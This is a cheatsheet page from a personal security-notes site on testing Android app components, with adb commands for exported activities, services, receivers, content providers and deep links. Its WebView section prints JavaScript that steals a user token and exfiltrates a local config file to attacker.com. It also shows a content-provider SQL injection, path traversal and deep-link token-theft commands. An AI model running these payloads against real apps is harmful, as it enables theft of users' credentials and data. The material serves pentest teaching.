Sec-88
  • πŸ§‘Whoami
  • πŸ•ΈοΈWeb-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
    • DNS Dangling / NS Takeover
  • βœ‰οΈAPI-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • πŸ“±Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • πŸ“ΆNetwork-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • πŸ’»Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
    • Amazon Cognito Misconfiguraitons
  • πŸ‘¨β€πŸ’»Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • πŸ–₯️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
  • IOS-AppSec
Powered by GitBook
On this page
  • Activities
  • Intents
  • Services
  • Broadcast Receivers
  • Content Providers
  • WebView
  • DeepLinks

Was this helpful?

Edit on GitHub
  1. Android-AppSec

Android App Components Security Cheatsheet

Activities

What is it?

Activities define screens in an app. They can be exposed using android:exported="true" or via intent-filters.

What to Look For?

  • Exported Activities (android:exported="true") that handle sensitive actions.

  • Implicit Intents that allow external apps to launch activities.

  • Sensitive Data Handling via getIntent().getExtras().

  • Task Hijacking – Malicious apps inserting themselves into tasks.

How to Test?

Check for Exported Activities

adb shell dumpsys package com.vulnapp | grep "android:exported"

Launch an Exported Activity via ADB

adb shell am start -n com.vulnapp/.SensitiveActivity

Send Malicious Data via Intent Injection

adb shell am start -n com.vulnapp/.TransferFundsActivity --es amount "99999"

Task Hijacking (Launch in a new task)

adb shell am start -n com.vulnapp/.LoginActivity -f 0x10000000

Intents

What is it?

Intents allow communication between app components. Exported components handling unvalidated intents can be exploited.

What to Look For?

  • Exported Components (android:exported="true") with intent-filters.

  • Implicit Intents allowing unintended external access.

  • Unvalidated Intent Extras that may be exploited.

  • Search for intent-handling code e.g Intent intent = getIntent().

How to Test?

Trigger an Intent via ADB

am start -a <action> --es <key> <value>

Send Data to an Activity

adb shell am start -n com.vulnapp/.VulnerableActivity --es "username" "hacker"

Broadcast an Intent

adb shell am broadcast -a com.vulnapp.EXPLOIT_ACTION --es "cmd" "reset_password"

Services

What is it?

Services run background tasks. Exported services can be triggered by external applications.

What to Look For?

  • Exported Services <services and (android:exported="true") in AndroidManifest.xml.

  • Sensitive Operations performed without authentication.

  • Binding to Services that lack proper permission checks.

How to Test?

List Running Services

adb shell dumpsys activity services | grep com.vulnapp

Start a Service Manually

adb shell am startservice -n com.vulnapp/.SensitiveService

Send Data to a Service

adb shell am startservice -n com.vulnapp/.DataSyncService --es "sync" "malicious_data"

Broadcast Receivers

What is it?

Broadcast Receivers handle system-wide and app-specific messages. If exported, they can be triggered by external sources.

What to Look For?

  • Exported Broadcast Receivers (android:exported="true") in AndroidManifest.xml.

  • nReceive method for sensitive data or actions.

  • Dynamically Registered Receivers via registerReceiver().

How to Test?

Send a Broadcast Message

adb shell am broadcast -a com.vulnapp.EXPLOIT_ACTION --es "status" "arm"

Check for Broadcast Registration in Running App

adb shell dumpsys activity broadcasts | grep com.vulnapp

Content Providers

What is it?

Content Providers manage access to structured data. If improperly secured, they may allow unauthorized access, SQL injection, or file traversal.

What to Look For?

  • Exported Content Providers (android:exported="true") in AndroidManifest.xml.

  • Sensitive Data Queries exposed via content URIs.

  • Verify permissions, especially protectionLevel values (e.g., dangerous or signature).

  • SQL Injection Risks in query(), insert(), update(), and delete().

  • Identify Table Names Search for content:// references in code to locate tables exposed via the ContentProvider

How to Test?

Check for Exported Content Providers

adb shell dumpsys package com.vulnapp | grep "provider"

Query a Content Provider

adb shell content query --uri content://com.vulnapp.provider/Users

Exploit SQL Injection

adb shell content query --uri content://com.vulnapp.provider/Users --projection "* FROM Credentials --"

Attempt Path Traversal

adb shell content read --uri content://com.vulnapp.provider/../../../../etc/hosts

WebView

What is it?

WebView is an Android component that renders web content inside apps. Poor configurations can lead to security vulnerabilities like XSS, token theft, and local file exfiltration.

What to Look For?

  • setJavaScriptEnabled(true) β†’ Allows JavaScript execution, leading to potential XSS.

  • addJavascriptInterface(Object, "interface") β†’ Exposes native Android methods to JavaScript, enabling token theft or arbitrary code execution.

  • setAllowFileAccess(true) & setAllowUniversalAccessFromFileURLs(true) β†’ Grants WebView access to local files, allowing data exfiltration.

  • setWebContentsDebuggingEnabled(true) β†’ Exposes WebView for debugging, making it easier for attackers to inspect app behavior.

  • Loading URLs from Intent or User Input loadUrl()β†’ Allows attackers to inject malicious URLs.

How to Exploit?

  • Trigger WebView with Malicious URL via ADB:

    adb shell am start -n com.vulnapp/.VulnerableWebView --es url "https://attacker.com/exploit.html"

  • Steal User Token using JavaScript Interface:

    var token = Android.getUserToken();
fetch('https://attacker.com/steal?token=' + token);

  • Local File Theft using setAllowUniversalAccessFromFileURLs(true)

    <script>
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'file:///data/data/com.vulnapp/shared_prefs/config.xml', true);
  xhr.onload = function() {
      fetch('https://attacker.com/exfil?data=' + btoa(xhr.responseText));
  };
  xhr.send();
</script>

DeepLinks

What is it?

Deep links allow apps to open specific activities via URLs (app://, http://). Misconfigured deep links can lead to security vulnerabilities..

How to Test?

  • Find Deep Links: Decompile APK & check AndroidManifest.xml for keywords like BROWSABLE and <dat tag and Exported="true" Webview and check if javascript enabled .

    jadx -d output_folder app.apk

  • Exploit Commands

    # steal tokens
adb shell am start -a android.intent.action.VIEW -d "app://login?token=12345"
# Open Redirect
adb shell am start -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=http://evil.com.target.com"
# Local File Disclosure
adb shell am start -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=file:///etc/hosts"
# Exploit Lack of Authentication for actions
adb shell am start -a android.intent.action.VIEW -d "myapp://resetpassword?token=123456"
PreviousPending IntentsNextAndroid App Pentesting Checklist

Last updated 3 months ago

Was this helpful?

πŸ“±